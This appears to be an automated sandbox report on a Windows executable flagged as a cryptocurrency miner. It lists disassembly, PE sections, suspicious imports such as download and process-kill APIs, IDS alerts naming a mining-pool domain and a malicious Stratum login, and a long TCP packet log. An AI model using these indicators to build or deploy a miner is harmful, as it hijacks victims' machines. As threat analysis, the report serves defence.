                                                                                                                                                            mov ecx, dword ptr [eax+08h]
                                                                                                                                                            dec eax
                                                                                                                                                            mov eax, dword ptr [ebx+08h]
                                                                                                                                                            test byte ptr [ecx+eax+03h], 0000000Fh
                                                                                                                                                            je 00007F955CAB253Dh
                                                                                                                                                            movzx eax, byte ptr [ecx+eax+03h]
                                                                                                                                                            and eax, FFFFFFF0h
                                                                                                                                                            dec esp
                                                                                                                                                            add ecx, eax
                                                                                                                                                            dec esp
                                                                                                                                                            xor ecx, edx
                                                                                                                                                            dec ecx
                                                                                                                                                            mov ecx, ecx
                                                                                                                                                            pop ebx
                                                                                                                                                            jmp 00007F955CAB1F5Eh
                                                                                                                                                            int3
                                                                                                                                                            dec eax
                                                                                                                                                            mov eax, esp
                                                                                                                                                            dec eax
                                                                                                                                                            mov dword ptr [eax+08h], ebx
                                                                                                                                                            dec eax
                                                                                                                                                            mov dword ptr [eax+10h], ebp
                                                                                                                                                            dec eax
                                                                                                                                                            mov dword ptr [eax+18h], esi
                                                                                                                                                            dec eax
                                                                                                                                                            mov dword ptr [eax+20h], edi
                                                                                                                                                            inc ecx
                                                                                                                                                            push esi
                                                                                                                                                            dec eax
                                                                                                                                                            sub esp, 20h
                                                                                                                                                            dec ecx
                                                                                                                                                            mov ebx, dword ptr [ecx+38h]
                                                                                                                                                            dec eax
                                                                                                                                                            mov esi, edx
                                                                                                                                                            dec ebp
                                                                                                                                                            mov esi, eax
                                                                                                                                                            dec eax
                                                                                                                                                            mov ebp, ecx
                                                                                                                                                            dec ecx
                                                                                                                                                            mov edx, ecx
                                                                                                                                                            dec eax
                                                                                                                                                            mov ecx, esi
                                                                                                                                                            dec ecx
                                                                                                                                                            mov edi, ecx
                                                                                                                                                            dec esp
                                                                                                                                                            lea eax, dword ptr [ebx+04h]
                                                                                                                                                            call 00007F955CAB24A1h

                                                                                                                                                            Data Directories

                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x67b140xb4.rdata
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x710000x1e0.rsrc
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x6c0000x3a44.pdata
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x720000xad4.reloc
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x60af00x38.rdata
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x60b300x138.rdata
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x490000x4b0.rdata
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                            Sections

                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                            .text0x10000x47d1e0x47e00False0.5263552989130434data6.4785624003078395IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                            .rdata0x490000x1fafc0x1fc00False0.5000538262795275data5.737042825412387IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                            .data0x690000x2eb40x1800False0.17447916666666666data3.3681576606439014IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                            .pdata0x6c0000x3a440x3c00False0.47454427083333334data5.540628739380997IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                            _RDATA0x700000xf40x200False0.314453125data2.4521543449117584IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                            .rsrc0x710000x1e00x200False0.529296875data4.7176788329467545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                            .reloc0x720000xad40xc00False0.4703776041666667data5.247491484262636IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                            Resources

                                                                                                                                                            NameRVASizeTypeLanguageCountry
                                                                                                                                                            RT_MANIFEST0x710600x17dXML 1.0 document textEnglishUnited States

                                                                                                                                                            Imports

                                                                                                                                                            DLLImport
                                                                                                                                                            KERNEL32.dllCreateDirectoryW, SizeofResource, HeapFree, lstrlenW, WriteFile, TerminateProcess, GetModuleFileNameW, CreateFileW, GetFileAttributesW, OpenProcess, SetFileAttributesW, CreateToolhelp32Snapshot, MultiByteToWideChar, Sleep, GetLastError, Process32NextW, lstrcatW, LockResource, DeleteFileW, Process32FirstW, CloseHandle, LoadLibraryW, CreateThread, LoadResource, FindResourceW, HeapAlloc, GetProcAddress, GetProcessHeap, CreateProcessW, GetModuleHandleW, CopyFileW, lstrcpyW, CreateProcessA, lstrcpyA, GetComputerNameW, WideCharToMultiByte, GetConsoleWindow, WriteConsoleW, HeapSize, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetOEMCP, GetACP, IsValidCodePage, GetTimeZoneInformation, HeapReAlloc, SetStdHandle, ReadConsoleW, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, LCMapStringW, CompareStringW, GetConsoleMode, GetConsoleCP, FlushFileBuffers, CreateFileA, GetFileTime, LocalFileTimeToFileTime, SetFileTime, DosDateTimeToFileTime, ReadFile, SetFilePointer, FindClose, LocalFree, FormatMessageA, GetCurrentDirectoryW, FindFirstFileExW, FindNextFileW, GetFileAttributesExW, GetFileInformationByHandle, GetFullPathNameW, SetEndOfFile, SetFilePointerEx, AreFileApisANSI, MoveFileExW, GetFileInformationByHandleEx, GetStringTypeW, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, GetCPInfo, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwindEx, RtlPcToFileHeader, RaiseException, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetDriveTypeW, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ExitProcess, GetModuleHandleExW, GetStdHandle, GetCommandLineA, GetCommandLineW, GetFileSizeEx, RtlUnwind
                                                                                                                                                            USER32.dllShowWindow
                                                                                                                                                            SHELL32.dllSHGetSpecialFolderPathW, ShellExecuteW
                                                                                                                                                            ole32.dllCoInitializeEx, CoSetProxyBlanket, CoInitializeSecurity, CoUninitialize, CoCreateInstance
                                                                                                                                                            OLEAUT32.dllVariantClear, SysAllocString, SysFreeString
                                                                                                                                                            WININET.dllInternetOpenA, InternetReadFile, InternetCloseHandle, InternetOpenUrlA
                                                                                                                                                            urlmon.dllURLDownloadToFileW
                                                                                                                                                            dxgi.dllCreateDXGIFactory

                                                                                                                                                            Possible Origin

                                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                                            EnglishUnited States

                                                                                                                                                            Network Behavior

                                                                                                                                                            Snort IDS Alerts

                                                                                                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                            192.168.2.48.8.8.856076532036289 07/07/22-09:51:17.942916UDP2036289ET TROJAN CoinMiner Domain in DNS Lookup (pool .hashvault .pro)5607653192.168.2.48.8.8.8
                                                                                                                                                            192.168.2.4131.153.56.9849760802831812 07/07/22-09:51:18.141462TCP2831812ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-16 8)4976080192.168.2.4131.153.56.98

                                                                                                                                                            Network Port Distribution

                                                                                                                                                            TCP Packets

                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Jul 7, 2022 09:51:07.703771114 CEST49733443192.168.2.452.20.78.240
                                                                                                                                                            Jul 7, 2022 09:51:07.703816891 CEST4434973352.20.78.240192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:07.703907967 CEST49733443192.168.2.452.20.78.240
                                                                                                                                                            Jul 7, 2022 09:51:07.719882011 CEST49733443192.168.2.452.20.78.240
                                                                                                                                                            Jul 7, 2022 09:51:07.719901085 CEST4434973352.20.78.240192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:08.014419079 CEST4434973352.20.78.240192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:08.014556885 CEST49733443192.168.2.452.20.78.240
                                                                                                                                                            Jul 7, 2022 09:51:08.388344049 CEST49733443192.168.2.452.20.78.240
                                                                                                                                                            Jul 7, 2022 09:51:08.388376951 CEST4434973352.20.78.240192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:08.388705015 CEST4434973352.20.78.240192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:08.388782978 CEST49733443192.168.2.452.20.78.240
                                                                                                                                                            Jul 7, 2022 09:51:08.391549110 CEST49733443192.168.2.452.20.78.240
                                                                                                                                                            Jul 7, 2022 09:51:08.432523012 CEST4434973352.20.78.240192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:08.531491995 CEST4434973352.20.78.240192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:08.531593084 CEST49733443192.168.2.452.20.78.240
                                                                                                                                                            Jul 7, 2022 09:51:08.531599998 CEST4434973352.20.78.240192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:08.531652927 CEST49733443192.168.2.452.20.78.240
                                                                                                                                                            Jul 7, 2022 09:51:08.533601046 CEST49733443192.168.2.452.20.78.240
                                                                                                                                                            Jul 7, 2022 09:51:08.533641100 CEST4434973352.20.78.240192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:08.945302963 CEST49739443192.168.2.4149.154.167.220
                                                                                                                                                            Jul 7, 2022 09:51:08.945338964 CEST44349739149.154.167.220192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:08.945453882 CEST49739443192.168.2.4149.154.167.220
                                                                                                                                                            Jul 7, 2022 09:51:08.946003914 CEST49739443192.168.2.4149.154.167.220
                                                                                                                                                            Jul 7, 2022 09:51:08.946014881 CEST44349739149.154.167.220192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.016248941 CEST44349739149.154.167.220192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.016422987 CEST49739443192.168.2.4149.154.167.220
                                                                                                                                                            Jul 7, 2022 09:51:09.023088932 CEST49739443192.168.2.4149.154.167.220
                                                                                                                                                            Jul 7, 2022 09:51:09.023113966 CEST44349739149.154.167.220192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.023348093 CEST44349739149.154.167.220192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.023430109 CEST49739443192.168.2.4149.154.167.220
                                                                                                                                                            Jul 7, 2022 09:51:09.024018049 CEST49739443192.168.2.4149.154.167.220
                                                                                                                                                            Jul 7, 2022 09:51:09.064495087 CEST44349739149.154.167.220192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.108030081 CEST44349739149.154.167.220192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.108102083 CEST44349739149.154.167.220192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.108109951 CEST49739443192.168.2.4149.154.167.220
                                                                                                                                                            Jul 7, 2022 09:51:09.108181000 CEST49739443192.168.2.4149.154.167.220
                                                                                                                                                            Jul 7, 2022 09:51:09.110771894 CEST49739443192.168.2.4149.154.167.220
                                                                                                                                                            Jul 7, 2022 09:51:09.110800028 CEST44349739149.154.167.220192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.110829115 CEST49739443192.168.2.4149.154.167.220
                                                                                                                                                            Jul 7, 2022 09:51:09.110855103 CEST49739443192.168.2.4149.154.167.220
                                                                                                                                                            Jul 7, 2022 09:51:09.292325974 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.292385101 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.292480946 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.292977095 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.292999983 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.336760044 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.336868048 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.348154068 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.348181009 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.348510981 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.348603010 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.349697113 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.392499924 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.394881010 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.394964933 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.395004988 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.395042896 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.395096064 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.395096064 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.395123959 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.395169973 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.395170927 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.395200014 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.395210028 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.395220995 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.395231009 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.395267010 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.395286083 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.395298958 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.395313978 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.395335913 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.395345926 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.395358086 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.395381927 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.395397902 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.395432949 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.395436049 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.395446062 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.395472050 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.395519972 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.395522118 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.395531893 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.395567894 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.395581961 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.395586014 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.395596027 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.395633936 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.395646095 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.395662069 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.395673037 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.395700932 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.395714998 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.395745993 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.395745993 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.395755053 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.395771027 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.395807028 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.395823956 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.395836115 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.395865917 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.395868063 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.395896912 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.395925999 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.395930052 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.395942926 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.395978928 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.395982981 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.396013975 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.396019936 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.396029949 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.396044970 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.396076918 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.396084070 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.396094084 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.396148920 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.396162033 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.396198988 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.396207094 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.396218061 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.396248102 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.396259069 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.396277905 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.396289110 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.396301031 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.396322966 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.396332979 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.396342993 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.396358967 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.396378994 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.396414042 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.396421909 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.396464109 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.412858963 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.412944078 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.412949085 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.412967920 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.413000107 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.413000107 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.413029909 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.413038015 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.413058043 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.413064003 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.413100958 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.413108110 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.413120031 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.413146973 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.413155079 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.413178921 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.413182020 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.413214922 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.413225889 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.413239002 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.413249969 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.413285017 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.413292885 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.413335085 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.430716991 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.430828094 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.430876017 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.430883884 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.430898905 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.430922985 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.430954933 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.430984020 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.431030035 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.431037903 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.431055069 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.431071997 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.431071997 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.431106091 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.431116104 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.431128025 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.431145906 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.431181908 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.431185007 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.431196928 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.431226969 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.431231976 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.431253910 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.431263924 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.431278944 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.431289911 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.431324005 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.431334019 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.431344986 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.431370020 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.431372881 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.431399107 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.431406975 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.431425095 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.431432962 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.431471109 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.431477070 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.431489944 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.431528091 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.431535959 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.431550980 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.431562901 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.431585073 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.431591034 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.431622028 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.431632042 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.431651115 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.431654930 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.431690931 CEST49746443192.168.2.4162.159.134.233
                                                                                                                                                            Jul 7, 2022 09:51:09.431699991 CEST44349746162.159.134.233192.168.2.4
                                                                                                                                                            Jul 7, 2022 09:51:09.431731939 CEST49746443192.168.2.4162.159.134.233
